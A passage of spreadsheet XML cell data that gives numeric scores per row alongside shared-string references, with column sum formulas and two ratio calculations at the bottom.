      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
      <c r="N2" s="4"/>
      <c r="O2" s="4"/>
      <c r="AE2" s="1"/>
      <c r="AG2" s="1"/>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="15" t="s">
        <v>30</v>
      </c>
      <c r="B3" s="15" t="s">
        <v>31</v>
      </c>
      <c r="C3" s="15">
        <v>0.0</v>
      </c>
      <c r="D3" s="15" t="s">
        <v>32</v>
      </c>
      <c r="E3" s="15">
        <v>2.0</v>
      </c>
      <c r="F3" s="16" t="s">
        <v>33</v>
      </c>
      <c r="G3" s="15">
        <v>2.0</v>
      </c>
      <c r="H3" s="15">
        <v>0.0</v>
      </c>
      <c r="I3" s="15" t="s">
        <v>34</v>
      </c>
      <c r="J3" s="15">
        <v>2.0</v>
      </c>
      <c r="K3" s="15">
        <v>0.0</v>
      </c>
      <c r="L3" s="15" t="s">
        <v>35</v>
      </c>
      <c r="M3" s="4">
        <v>2.0</v>
      </c>
      <c r="N3" s="4"/>
      <c r="O3" s="4"/>
      <c r="AE3" s="1"/>
      <c r="AG3" s="1"/>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="15" t="s">
        <v>36</v>
      </c>
      <c r="B4" s="15" t="s">
        <v>37</v>
      </c>
      <c r="C4" s="15">
        <v>0.0</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>38</v>
      </c>
      <c r="E4" s="15">
        <v>1.0</v>
      </c>
      <c r="F4" s="16" t="s">
        <v>39</v>
      </c>
      <c r="G4" s="15">
        <v>1.0</v>
      </c>
      <c r="H4" s="15">
        <v>1.0</v>
      </c>
      <c r="I4" s="15" t="s">
        <v>40</v>
      </c>
      <c r="J4" s="15">
        <v>1.0</v>
      </c>
      <c r="K4" s="15">
        <v>0.0</v>
      </c>
      <c r="L4" s="15" t="s">
        <v>41</v>
      </c>
      <c r="M4" s="4">
        <v>1.0</v>
      </c>
      <c r="N4" s="4"/>
      <c r="O4" s="4"/>
      <c r="AE4" s="1"/>
      <c r="AG4" s="1"/>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="15" t="s">
        <v>42</v>
      </c>
      <c r="B5" s="15" t="s">
        <v>43</v>
      </c>
      <c r="C5" s="15">
        <v>0.0</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>44</v>
      </c>
      <c r="E5" s="15">
        <v>1.0</v>
      </c>
      <c r="F5" s="16" t="s">
        <v>45</v>
      </c>
      <c r="G5" s="15">
        <v>1.0</v>
      </c>
      <c r="H5" s="15">
        <v>0.0</v>
      </c>
      <c r="I5" s="15" t="s">
        <v>46</v>
      </c>
      <c r="J5" s="15">
        <v>1.0</v>
      </c>
      <c r="K5" s="15">
        <v>0.0</v>
      </c>
      <c r="L5" s="15" t="s">
        <v>47</v>
      </c>
      <c r="M5" s="4">
        <v>1.0</v>
      </c>
      <c r="N5" s="4"/>
      <c r="O5" s="4"/>
      <c r="AE5" s="1"/>
      <c r="AG5" s="1"/>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="15" t="s">
        <v>48</v>
      </c>
      <c r="B6" s="15" t="s">
        <v>49</v>
      </c>
      <c r="C6" s="15">
        <v>1.0</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>50</v>
      </c>
      <c r="E6" s="15">
        <v>1.0</v>
      </c>
      <c r="F6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="G6" s="15">
        <v>1.0</v>
      </c>
      <c r="H6" s="15">
        <v>0.0</v>
      </c>
      <c r="I6" s="15" t="s">
        <v>52</v>
      </c>
      <c r="J6" s="15">
        <v>1.0</v>
      </c>
      <c r="K6" s="15">
        <v>0.0</v>
      </c>
      <c r="L6" s="15" t="s">
        <v>53</v>
      </c>
      <c r="M6" s="4">
        <v>1.0</v>
      </c>
      <c r="N6" s="4"/>
      <c r="O6" s="4"/>
      <c r="AE6" s="1"/>
      <c r="AG6" s="1"/>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="A7" s="15" t="s">
        <v>54</v>
      </c>
      <c r="B7" s="15" t="s">
        <v>55</v>
      </c>
      <c r="C7" s="15">
        <v>0.0</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>56</v>
      </c>
      <c r="E7" s="15">
        <v>1.0</v>
      </c>
      <c r="F7" s="16" t="s">
        <v>57</v>
      </c>
      <c r="G7" s="15">
        <v>1.0</v>
      </c>
      <c r="H7" s="15">
        <v>0.0</v>
      </c>
      <c r="I7" s="15" t="s">
        <v>58</v>
      </c>
      <c r="J7" s="15">
        <v>1.0</v>
      </c>
      <c r="K7" s="15">
        <v>0.0</v>
      </c>
      <c r="L7" s="15" t="s">
        <v>59</v>
      </c>
      <c r="M7" s="4">
        <v>1.0</v>
      </c>
      <c r="N7" s="4"/>
      <c r="O7" s="4"/>
      <c r="AE7" s="1"/>
      <c r="AG7" s="1"/>
    </row>
    <row r="8" ht="15.75" customHeight="1">
      <c r="A8" s="15" t="s">
        <v>60</v>
      </c>
      <c r="B8" s="15" t="s">
        <v>61</v>
      </c>
      <c r="C8" s="15">
        <v>0.0</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>62</v>
      </c>
      <c r="E8" s="15">
        <v>1.0</v>
      </c>
      <c r="F8" s="16" t="s">
        <v>63</v>
      </c>
      <c r="G8" s="15">
        <v>1.0</v>
      </c>
      <c r="H8" s="15">
        <v>0.0</v>
      </c>
      <c r="I8" s="15" t="s">
        <v>64</v>
      </c>
      <c r="J8" s="15">
        <v>1.0</v>
      </c>
      <c r="K8" s="15">
        <v>0.0</v>
      </c>
      <c r="L8" s="15" t="s">
        <v>65</v>
      </c>
      <c r="M8" s="4">
        <v>1.0</v>
      </c>
      <c r="N8" s="4"/>
      <c r="O8" s="4"/>
      <c r="AE8" s="1"/>
      <c r="AG8" s="1"/>
    </row>
    <row r="9" ht="15.75" customHeight="1">
      <c r="A9" s="15" t="s">
        <v>66</v>
      </c>
      <c r="B9" s="15" t="s">
        <v>67</v>
      </c>
      <c r="C9" s="15">
        <v>1.0</v>
      </c>
      <c r="D9" s="15" t="s">
        <v>68</v>
      </c>
      <c r="E9" s="15">
        <v>1.0</v>
      </c>
      <c r="F9" s="16" t="s">
        <v>69</v>
      </c>
      <c r="G9" s="15">
        <v>1.0</v>
      </c>
      <c r="H9" s="15">
        <v>1.0</v>
      </c>
      <c r="I9" s="15" t="s">
        <v>70</v>
      </c>
      <c r="J9" s="15">
        <v>1.0</v>
      </c>
      <c r="K9" s="15">
        <v>0.0</v>
      </c>
      <c r="L9" s="15" t="s">
        <v>71</v>
      </c>
      <c r="M9" s="4">
        <v>1.0</v>
      </c>
      <c r="N9" s="4"/>
      <c r="O9" s="4"/>
      <c r="AE9" s="1"/>
      <c r="AG9" s="1"/>
    </row>
    <row r="10" ht="15.75" customHeight="1">
      <c r="A10" s="15" t="s">
        <v>72</v>
      </c>
      <c r="B10" s="15" t="s">
        <v>73</v>
      </c>
      <c r="C10" s="15">
        <v>1.0</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>74</v>
      </c>
      <c r="E10" s="15">
        <v>1.0</v>
      </c>
      <c r="F10" s="16" t="s">
        <v>75</v>
      </c>
      <c r="G10" s="15">
        <v>1.0</v>
      </c>
      <c r="H10" s="15">
        <v>0.0</v>
      </c>
      <c r="I10" s="15" t="s">
        <v>76</v>
      </c>
      <c r="J10" s="15">
        <v>1.0</v>
      </c>
      <c r="K10" s="15">
        <v>0.0</v>
      </c>
      <c r="L10" s="15" t="s">
        <v>77</v>
      </c>
      <c r="M10" s="4">
        <v>1.0</v>
      </c>
      <c r="N10" s="4"/>
      <c r="O10" s="4"/>
      <c r="AE10" s="1"/>
      <c r="AG10" s="1"/>
    </row>
    <row r="11" ht="15.75" customHeight="1">
      <c r="A11" s="15" t="s">
        <v>78</v>
      </c>
      <c r="B11" s="15" t="s">
        <v>79</v>
      </c>
      <c r="C11" s="15">
        <v>0.0</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>80</v>
      </c>
      <c r="E11" s="15">
        <v>1.0</v>
      </c>
      <c r="F11" s="16" t="s">
        <v>81</v>
      </c>
      <c r="G11" s="15">
        <v>0.0</v>
      </c>
      <c r="H11" s="15">
        <v>1.0</v>
      </c>
      <c r="I11" s="15" t="s">
        <v>82</v>
      </c>
      <c r="J11" s="15">
        <v>1.0</v>
      </c>
      <c r="K11" s="15">
        <v>1.0</v>
      </c>
      <c r="L11" s="15" t="s">
        <v>83</v>
      </c>
      <c r="M11" s="4">
        <v>3.0</v>
      </c>
      <c r="N11" s="4"/>
      <c r="O11" s="4"/>
      <c r="AE11" s="1"/>
      <c r="AG11" s="1"/>
    </row>
    <row r="12" ht="15.75" customHeight="1">
      <c r="A12" s="15" t="s">
        <v>78</v>
      </c>
      <c r="B12" s="15" t="s">
        <v>84</v>
      </c>
      <c r="C12" s="15">
        <v>0.0</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>85</v>
      </c>
      <c r="E12" s="15">
        <v>0.0</v>
      </c>
      <c r="F12" s="16" t="s">
        <v>86</v>
      </c>
      <c r="G12" s="15">
        <v>0.0</v>
      </c>
      <c r="H12" s="15">
        <v>0.0</v>
      </c>
      <c r="I12" s="15" t="s">
        <v>87</v>
      </c>
      <c r="J12" s="15">
        <v>0.0</v>
      </c>
      <c r="K12" s="15">
        <v>3.0</v>
      </c>
      <c r="L12" s="15" t="s">
        <v>88</v>
      </c>
      <c r="M12" s="4" t="s">
        <v>89</v>
      </c>
      <c r="N12" s="4"/>
      <c r="O12" s="4"/>
      <c r="AE12" s="1"/>
      <c r="AG12" s="1"/>
    </row>
    <row r="13" ht="15.75" customHeight="1">
      <c r="A13" s="15" t="s">
        <v>78</v>
      </c>
      <c r="B13" s="15" t="s">
        <v>90</v>
      </c>
      <c r="C13" s="15">
        <v>0.0</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>85</v>
      </c>
      <c r="E13" s="15">
        <v>1.0</v>
      </c>
      <c r="F13" s="16" t="s">
        <v>91</v>
      </c>
      <c r="G13" s="15">
        <v>0.0</v>
      </c>
      <c r="H13" s="15">
        <v>0.0</v>
      </c>
      <c r="I13" s="15" t="s">
        <v>87</v>
      </c>
      <c r="J13" s="15">
        <v>1.0</v>
      </c>
      <c r="K13" s="15">
        <v>0.0</v>
      </c>
      <c r="L13" s="15" t="s">
        <v>92</v>
      </c>
      <c r="M13" s="4" t="s">
        <v>89</v>
      </c>
      <c r="N13" s="4"/>
      <c r="O13" s="4"/>
      <c r="AE13" s="1"/>
      <c r="AG13" s="1"/>
    </row>
    <row r="14" ht="15.75" customHeight="1">
      <c r="A14" s="15" t="s">
        <v>93</v>
      </c>
      <c r="B14" s="15" t="s">
        <v>94</v>
      </c>
      <c r="C14" s="15">
        <v>0.0</v>
      </c>
      <c r="D14" s="15" t="s">
        <v>95</v>
      </c>
      <c r="E14" s="15">
        <v>1.0</v>
      </c>
      <c r="F14" s="16" t="s">
        <v>96</v>
      </c>
      <c r="G14" s="15">
        <v>0.0</v>
      </c>
      <c r="H14" s="15">
        <v>3.0</v>
      </c>
      <c r="I14" s="15" t="s">
        <v>97</v>
      </c>
      <c r="J14" s="15">
        <v>1.0</v>
      </c>
      <c r="K14" s="15">
        <v>0.0</v>
      </c>
      <c r="L14" s="15" t="s">
        <v>98</v>
      </c>
      <c r="M14" s="4">
        <v>3.0</v>
      </c>
      <c r="N14" s="4"/>
      <c r="O14" s="4"/>
      <c r="AE14" s="1"/>
      <c r="AG14" s="1"/>
    </row>
    <row r="15" ht="15.75" customHeight="1">
      <c r="A15" s="15" t="s">
        <v>93</v>
      </c>
      <c r="B15" s="15" t="s">
        <v>99</v>
      </c>
      <c r="C15" s="15">
        <v>0.0</v>
      </c>
      <c r="D15" s="15" t="s">
        <v>100</v>
      </c>
      <c r="E15" s="15">
        <v>1.0</v>
      </c>
      <c r="F15" s="16" t="s">
        <v>101</v>
      </c>
      <c r="G15" s="15">
        <v>1.0</v>
      </c>
      <c r="H15" s="15">
        <v>0.0</v>
      </c>
      <c r="I15" s="15" t="s">
        <v>102</v>
      </c>
      <c r="J15" s="15">
        <v>1.0</v>
      </c>
      <c r="K15" s="15">
        <v>0.0</v>
      </c>
      <c r="L15" s="15" t="s">
        <v>103</v>
      </c>
      <c r="M15" s="4" t="s">
        <v>89</v>
      </c>
      <c r="N15" s="4"/>
      <c r="O15" s="4"/>
      <c r="AE15" s="1"/>
      <c r="AG15" s="1"/>
    </row>
    <row r="16" ht="15.75" customHeight="1">
      <c r="A16" s="15" t="s">
        <v>93</v>
      </c>
      <c r="B16" s="15" t="s">
        <v>104</v>
      </c>
      <c r="C16" s="15">
        <v>0.0</v>
      </c>
      <c r="D16" s="15" t="s">
        <v>100</v>
      </c>
      <c r="E16" s="15">
        <v>0.0</v>
      </c>
      <c r="F16" s="16" t="s">
        <v>105</v>
      </c>
      <c r="G16" s="15">
        <v>0.0</v>
      </c>
      <c r="H16" s="15">
        <v>0.0</v>
      </c>
      <c r="I16" s="15" t="s">
        <v>102</v>
      </c>
      <c r="J16" s="15">
        <v>0.0</v>
      </c>
      <c r="K16" s="15">
        <v>0.0</v>
      </c>
      <c r="L16" s="15" t="s">
        <v>106</v>
      </c>
      <c r="M16" s="4" t="s">
        <v>89</v>
      </c>
      <c r="N16" s="4"/>
      <c r="O16" s="4"/>
      <c r="AE16" s="1"/>
      <c r="AG16" s="1"/>
    </row>
    <row r="17" ht="15.75" customHeight="1">
      <c r="A17" s="15" t="s">
        <v>107</v>
      </c>
      <c r="B17" s="15" t="s">
        <v>108</v>
      </c>
      <c r="C17" s="15">
        <v>1.0</v>
      </c>
      <c r="D17" s="15" t="s">
        <v>109</v>
      </c>
      <c r="E17" s="15">
        <v>1.0</v>
      </c>
      <c r="F17" s="16" t="s">
        <v>110</v>
      </c>
      <c r="G17" s="15">
        <v>1.0</v>
      </c>
      <c r="H17" s="15">
        <v>0.0</v>
      </c>
      <c r="I17" s="15" t="s">
        <v>111</v>
      </c>
      <c r="J17" s="15">
        <v>1.0</v>
      </c>
      <c r="K17" s="15">
        <v>0.0</v>
      </c>
      <c r="L17" s="15" t="s">
        <v>112</v>
      </c>
      <c r="M17" s="4">
        <v>1.0</v>
      </c>
      <c r="N17" s="4"/>
      <c r="O17" s="4"/>
      <c r="AE17" s="1"/>
      <c r="AG17" s="1"/>
    </row>
    <row r="18" ht="15.75" customHeight="1">
      <c r="A18" s="15" t="s">
        <v>113</v>
      </c>
      <c r="B18" s="15" t="s">
        <v>114</v>
      </c>
      <c r="C18" s="15">
        <v>1.0</v>
      </c>
      <c r="D18" s="15" t="s">
        <v>115</v>
      </c>
      <c r="E18" s="15">
        <v>1.0</v>
      </c>
      <c r="F18" s="16" t="s">
        <v>116</v>
      </c>
      <c r="G18" s="15">
        <v>1.0</v>
      </c>
      <c r="H18" s="15">
        <v>0.0</v>
      </c>
      <c r="I18" s="15" t="s">
        <v>117</v>
      </c>
      <c r="J18" s="15">
        <v>1.0</v>
      </c>
      <c r="K18" s="15">
        <v>0.0</v>
      </c>
      <c r="L18" s="15" t="s">
        <v>118</v>
      </c>
      <c r="M18" s="4">
        <v>1.0</v>
      </c>
      <c r="N18" s="4"/>
      <c r="O18" s="4"/>
      <c r="AE18" s="1"/>
      <c r="AG18" s="1"/>
    </row>
    <row r="19" ht="15.75" customHeight="1">
      <c r="A19" s="15" t="s">
        <v>119</v>
      </c>
      <c r="B19" s="15" t="s">
        <v>120</v>
      </c>
      <c r="C19" s="15">
        <v>1.0</v>
      </c>
      <c r="D19" s="15" t="s">
        <v>121</v>
      </c>
      <c r="E19" s="15">
        <v>1.0</v>
      </c>
      <c r="F19" s="16" t="s">
        <v>122</v>
      </c>
      <c r="G19" s="15">
        <v>0.0</v>
      </c>
      <c r="H19" s="15">
        <v>5.0</v>
      </c>
      <c r="I19" s="15" t="s">
        <v>123</v>
      </c>
      <c r="J19" s="15">
        <v>1.0</v>
      </c>
      <c r="K19" s="15">
        <v>0.0</v>
      </c>
      <c r="L19" s="15" t="s">
        <v>124</v>
      </c>
      <c r="M19" s="4">
        <v>1.0</v>
      </c>
      <c r="N19" s="4"/>
      <c r="O19" s="4"/>
      <c r="AE19" s="1"/>
      <c r="AG19" s="1"/>
    </row>
    <row r="20" ht="15.75" customHeight="1">
      <c r="A20" s="15" t="s">
        <v>125</v>
      </c>
      <c r="B20" s="15" t="s">
        <v>126</v>
      </c>
      <c r="C20" s="15">
        <v>1.0</v>
      </c>
      <c r="D20" s="15" t="s">
        <v>127</v>
      </c>
      <c r="E20" s="15">
        <v>1.0</v>
      </c>
      <c r="F20" s="16" t="s">
        <v>128</v>
      </c>
      <c r="G20" s="15">
        <v>1.0</v>
      </c>
      <c r="H20" s="15">
        <v>0.0</v>
      </c>
      <c r="I20" s="15" t="s">
        <v>129</v>
      </c>
      <c r="J20" s="15">
        <v>1.0</v>
      </c>
      <c r="K20" s="15">
        <v>0.0</v>
      </c>
      <c r="L20" s="15" t="s">
        <v>130</v>
      </c>
      <c r="M20" s="4">
        <v>1.0</v>
      </c>
      <c r="N20" s="4"/>
      <c r="O20" s="4"/>
      <c r="AE20" s="1"/>
      <c r="AG20" s="1"/>
    </row>
    <row r="21" ht="15.75" customHeight="1">
      <c r="A21" s="15" t="s">
        <v>131</v>
      </c>
      <c r="B21" s="15" t="s">
        <v>132</v>
      </c>
      <c r="C21" s="15">
        <v>1.0</v>
      </c>
      <c r="D21" s="15" t="s">
        <v>133</v>
      </c>
      <c r="E21" s="15">
        <v>1.0</v>
      </c>
      <c r="F21" s="16" t="s">
        <v>134</v>
      </c>
      <c r="G21" s="15">
        <v>1.0</v>
      </c>
      <c r="H21" s="15">
        <v>0.0</v>
      </c>
      <c r="I21" s="15" t="s">
        <v>135</v>
      </c>
      <c r="J21" s="15">
        <v>1.0</v>
      </c>
      <c r="K21" s="15">
        <v>0.0</v>
      </c>
      <c r="L21" s="15" t="s">
        <v>136</v>
      </c>
      <c r="M21" s="4">
        <v>1.0</v>
      </c>
      <c r="N21" s="4"/>
      <c r="O21" s="4"/>
      <c r="AE21" s="1"/>
      <c r="AG21" s="1"/>
    </row>
    <row r="22" ht="15.75" customHeight="1">
      <c r="A22" s="15" t="s">
        <v>137</v>
      </c>
      <c r="B22" s="15" t="s">
        <v>138</v>
      </c>
      <c r="C22" s="15">
        <v>1.0</v>
      </c>
      <c r="D22" s="15" t="s">
        <v>139</v>
      </c>
      <c r="E22" s="15">
        <v>1.0</v>
      </c>
      <c r="F22" s="16" t="s">
        <v>140</v>
      </c>
      <c r="G22" s="15">
        <v>1.0</v>
      </c>
      <c r="H22" s="15">
        <v>0.0</v>
      </c>
      <c r="I22" s="15" t="s">
        <v>141</v>
      </c>
      <c r="J22" s="15">
        <v>1.0</v>
      </c>
      <c r="K22" s="15">
        <v>0.0</v>
      </c>
      <c r="L22" s="15" t="s">
        <v>142</v>
      </c>
      <c r="M22" s="4">
        <v>1.0</v>
      </c>
      <c r="N22" s="4"/>
      <c r="O22" s="4"/>
      <c r="AE22" s="1"/>
      <c r="AG22" s="1"/>
    </row>
    <row r="23" ht="15.75" customHeight="1">
      <c r="A23" s="15" t="s">
        <v>143</v>
      </c>
      <c r="B23" s="15" t="s">
        <v>144</v>
      </c>
      <c r="C23" s="15">
        <v>1.0</v>
      </c>
      <c r="D23" s="15" t="s">
        <v>145</v>
      </c>
      <c r="E23" s="15">
        <v>1.0</v>
      </c>
      <c r="F23" s="16" t="s">
        <v>146</v>
      </c>
      <c r="G23" s="15">
        <v>1.0</v>
      </c>
      <c r="H23" s="15">
        <v>1.0</v>
      </c>
      <c r="I23" s="15" t="s">
        <v>147</v>
      </c>
      <c r="J23" s="15">
        <v>1.0</v>
      </c>
      <c r="K23" s="15">
        <v>0.0</v>
      </c>
      <c r="L23" s="15" t="s">
        <v>148</v>
      </c>
      <c r="M23" s="4">
        <v>1.0</v>
      </c>
      <c r="N23" s="4"/>
      <c r="O23" s="4"/>
      <c r="AE23" s="1"/>
      <c r="AG23" s="1"/>
    </row>
    <row r="24" ht="18.0" customHeight="1">
      <c r="A24" s="17" t="s">
        <v>149</v>
      </c>
      <c r="B24" s="17" t="s">
        <v>150</v>
      </c>
      <c r="C24" s="17">
        <v>1.0</v>
      </c>
      <c r="D24" s="17" t="s">
        <v>151</v>
      </c>
      <c r="E24" s="15">
        <v>1.0</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>152</v>
      </c>
      <c r="G24" s="15">
        <v>1.0</v>
      </c>
      <c r="H24" s="15">
        <v>0.0</v>
      </c>
      <c r="I24" s="15" t="s">
        <v>153</v>
      </c>
      <c r="J24" s="17">
        <v>1.0</v>
      </c>
      <c r="K24" s="15">
        <v>0.0</v>
      </c>
      <c r="L24" s="15" t="s">
        <v>154</v>
      </c>
      <c r="M24" s="4">
        <v>1.0</v>
      </c>
      <c r="N24" s="18"/>
      <c r="O24" s="18"/>
      <c r="P24" s="18"/>
      <c r="Q24" s="18"/>
      <c r="R24" s="18"/>
      <c r="T24" s="18"/>
      <c r="U24" s="18"/>
      <c r="V24" s="18"/>
      <c r="X24" s="18"/>
      <c r="Y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row>
    <row r="25">
      <c r="A25" s="19"/>
      <c r="B25" s="19"/>
      <c r="C25" s="19">
        <f>SUM(C3:C24)</f>
        <v>11</v>
      </c>
      <c r="D25" s="19"/>
      <c r="E25" s="19">
        <f t="shared" ref="E25:G25" si="1">SUM(E3:E24)</f>
        <v>21</v>
      </c>
      <c r="F25" s="19">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G25" s="19">
        <f t="shared" si="1"/>
        <v>17</v>
      </c>
      <c r="H25" s="20">
        <f>sum(H3:H24)</f>
        <v>12</v>
      </c>
      <c r="I25" s="19">
        <f t="shared" ref="I25:J25" si="2">SUM(I3:I24)</f>
        <v>0</v>
      </c>
      <c r="J25" s="19">
        <f t="shared" si="2"/>
        <v>21</v>
      </c>
      <c r="K25" s="20">
        <f>sum(K3:K24)</f>
        <v>4</v>
      </c>
      <c r="L25" s="19">
        <f>SUM(L3:L24)</f>
        <v>0</v>
      </c>
      <c r="M25" s="18">
        <f>sum(M3:M24)</f>
        <v>23</v>
      </c>
      <c r="AC25" s="5"/>
      <c r="AE25" s="5"/>
      <c r="AG25" s="5"/>
    </row>
    <row r="26">
      <c r="A26" s="19"/>
      <c r="B26" s="19"/>
      <c r="C26" s="19"/>
      <c r="D26" s="19"/>
      <c r="E26" s="19"/>
      <c r="F26" s="19"/>
      <c r="G26" s="19"/>
      <c r="H26" s="15" t="s">
        <v>155</v>
      </c>
      <c r="I26" s="19"/>
      <c r="J26" s="19"/>
      <c r="K26" s="15" t="s">
        <v>156</v>
      </c>
      <c r="L26" s="19"/>
      <c r="AC26" s="5"/>
      <c r="AE26" s="5"/>
      <c r="AG26" s="5"/>
    </row>
    <row r="27">
      <c r="A27" s="19"/>
      <c r="B27" s="19"/>
      <c r="C27" s="19"/>
      <c r="D27" s="19"/>
      <c r="E27" s="19"/>
      <c r="F27" s="19"/>
      <c r="G27" s="19"/>
      <c r="H27" s="19">
        <f>12/(12+17)</f>
        <v>0.4137931034</v>
      </c>
      <c r="I27" s="19"/>
      <c r="J27" s="19"/>
      <c r="K27" s="19">
        <f>K25/(J25+K25)</f>
        <v>0.16</v>
      </c>
      <c r="L27" s="19"/>
      <c r="AC27" s="5"/>
      <c r="AE27" s="5"/>
      <c r="AG27" s="5"/>
    </row>
    <row r="28">
      <c r="A28" s="19"/>
      <c r="B28" s="19"/>
      <c r="C28" s="19"/>
      <c r="D28" s="19"/>
      <c r="E28" s="19"/>
      <c r="F28" s="19"/>
      <c r="G28" s="19"/>
      <c r="H28" s="19"/>
      <c r="I28" s="19"/>
      <c r="J28" s="19"/>
      <c r="K28" s="19"/>
      <c r="L28" s="19"/>
      <c r="AC28" s="5"/>
      <c r="AE28" s="5"/>
      <c r="AG28" s="5"/>
    </row>
    <row r="29">
      <c r="A29" s="19"/>
      <c r="B29" s="19"/>
      <c r="C29" s="19"/>
      <c r="D29" s="19"/>
      <c r="E29" s="19"/>
      <c r="F29" s="19"/>
      <c r="G29" s="19"/>
      <c r="H29" s="19"/>
      <c r="I29" s="19"/>
      <c r="J29" s="19"/>
      <c r="K29" s="19"/>
      <c r="L29" s="19"/>
      <c r="AC29" s="5"/>
      <c r="AE29" s="5"/>
      <c r="AG29" s="5"/>
    </row>
    <row r="30">
      <c r="A30" s="19"/>
      <c r="B30" s="19"/>
      <c r="C30" s="19"/>
      <c r="D30" s="19"/>
      <c r="E30" s="19"/>
      <c r="F30" s="19"/>
      <c r="G30" s="19"/>
      <c r="H30" s="19"/>
      <c r="I30" s="19"/>
      <c r="J30" s="19"/>
      <c r="K30" s="19"/>
      <c r="L30" s="19"/>
      <c r="AC30" s="5"/>
      <c r="AE30" s="5"/>
      <c r="AG30" s="5"/>
    </row>
    <row r="31">
      <c r="A31" s="19"/>
      <c r="B31" s="19"/>
      <c r="C31" s="19"/>
      <c r="D31" s="19"/>
      <c r="E31" s="19"/>
      <c r="F31" s="19"/>
      <c r="G31" s="19"/>
      <c r="H31" s="19"/>
      <c r="I31" s="19"/>
      <c r="J31" s="19"/>
      <c r="K31" s="19"/>
      <c r="L31" s="19"/>
      <c r="AC31" s="5"/>
      <c r="AE31" s="5"/>
      <c r="AG31" s="5"/>
    </row>
    <row r="32">
      <c r="A32" s="19"/>
      <c r="B32" s="19"/>
      <c r="C32" s="19"/>
      <c r="D32" s="19"/>
      <c r="E32" s="19"/>
      <c r="F32" s="19"/>
      <c r="G32" s="19"/>
      <c r="H32" s="19"/>
      <c r="I32" s="19"/>
      <c r="J32" s="19"/>
      <c r="K32" s="19"/>
      <c r="L32" s="19"/>
      <c r="AC32" s="5"/>
      <c r="AE32" s="5"/>
      <c r="AG32" s="5"/>
    </row>
    <row r="33">
      <c r="A33" s="19"/>
      <c r="B33" s="19"/>
      <c r="C33" s="19"/>
      <c r="D33" s="19"/>
      <c r="E33" s="19"/>
      <c r="F33" s="19"/>
      <c r="G33" s="19"/>
      <c r="H33" s="19"/>
      <c r="I33" s="19"/>
      <c r="J33" s="19"/>
      <c r="K33" s="19"/>
      <c r="L33" s="19"/>
      <c r="AC33" s="5"/>
      <c r="AE33" s="5"/>
      <c r="AG33" s="5"/>
    </row>
    <row r="34">
      <c r="A34" s="19"/>
      <c r="B34" s="19"/>
      <c r="C34" s="19"/>
      <c r="D34" s="19"/>
      <c r="E34" s="19"/>
      <c r="F34" s="19"/>
      <c r="G34" s="19"/>
      <c r="H34" s="19"/>
      <c r="I34" s="19"/>
      <c r="J34" s="19"/>
      <c r="K34" s="19"/>
      <c r="L34" s="19"/>
      <c r="AC34" s="5"/>
      <c r="AE34" s="5"/>
      <c r="AG34" s="5"/>
    </row>
    <row r="35">
      <c r="A35" s="19"/>
      <c r="B35" s="19"/>
      <c r="C35" s="19"/>
      <c r="D35" s="19"/>
      <c r="E35" s="19"/>
      <c r="F35" s="19"/>
      <c r="G35" s="19"/>
      <c r="H35" s="19"/>
      <c r="I35" s="19"/>
      <c r="J35" s="19"/>
      <c r="K35" s="19"/>
      <c r="L35" s="19"/>
      <c r="AC35" s="5"/>
      <c r="AE35" s="5"/>
      <c r="AG35" s="5"/>
    </row>
    <row r="36">
      <c r="A36" s="19"/>
      <c r="B36" s="19"/>
      <c r="C36" s="19"/>
      <c r="D36" s="19"/>
      <c r="E36" s="19"/>
      <c r="F36" s="19"/>
      <c r="G36" s="19"/>
      <c r="H36" s="19"/>
      <c r="I36" s="19"/>
      <c r="J36" s="19"/>
      <c r="K36" s="19"/>
      <c r="L36" s="19"/>
      <c r="AC36" s="5"/>
      <c r="AE36" s="5"/>
      <c r="AG36" s="5"/>
    </row>
    <row r="37">
      <c r="A37" s="19"/>
      <c r="B37" s="19"/>
      <c r="C37" s="19"/>
      <c r="D37" s="19"/>
      <c r="E37" s="19"/>
      <c r="F37" s="19"/>
      <c r="G37" s="19"/>
      <c r="H37" s="19"/>
      <c r="I37" s="19"/>
      <c r="J37" s="19"/>
      <c r="K37" s="19"/>
      <c r="L37" s="19"/>
      <c r="AC37" s="5"/>
      <c r="AE37" s="5"/>
      <c r="AG37" s="5"/>
    </row>
    <row r="38">
      <c r="A38" s="19"/>
      <c r="B38" s="19"/>
      <c r="C38" s="19"/>
      <c r="D38" s="19"/>
      <c r="E38" s="19"/>
      <c r="F38" s="19"/>
      <c r="G38" s="19"/>
      <c r="H38" s="19"/>
      <c r="I38" s="19"/>
      <c r="J38" s="19"/>
      <c r="K38" s="19"/>
      <c r="L38" s="19"/>
      <c r="AC38" s="5"/>
      <c r="AE38" s="5"/>
      <c r="AG38" s="5"/>
    </row>
    <row r="39">
      <c r="A39" s="19"/>
      <c r="B39" s="19"/>
      <c r="C39" s="19"/>
      <c r="D39" s="19"/>
      <c r="E39" s="19"/>
      <c r="F39" s="19"/>
      <c r="G39" s="19"/>
      <c r="H39" s="19"/>
      <c r="I39" s="19"/>
      <c r="J39" s="19"/>
      <c r="K39" s="19"/>
      <c r="L39" s="19"/>
      <c r="AC39" s="5"/>
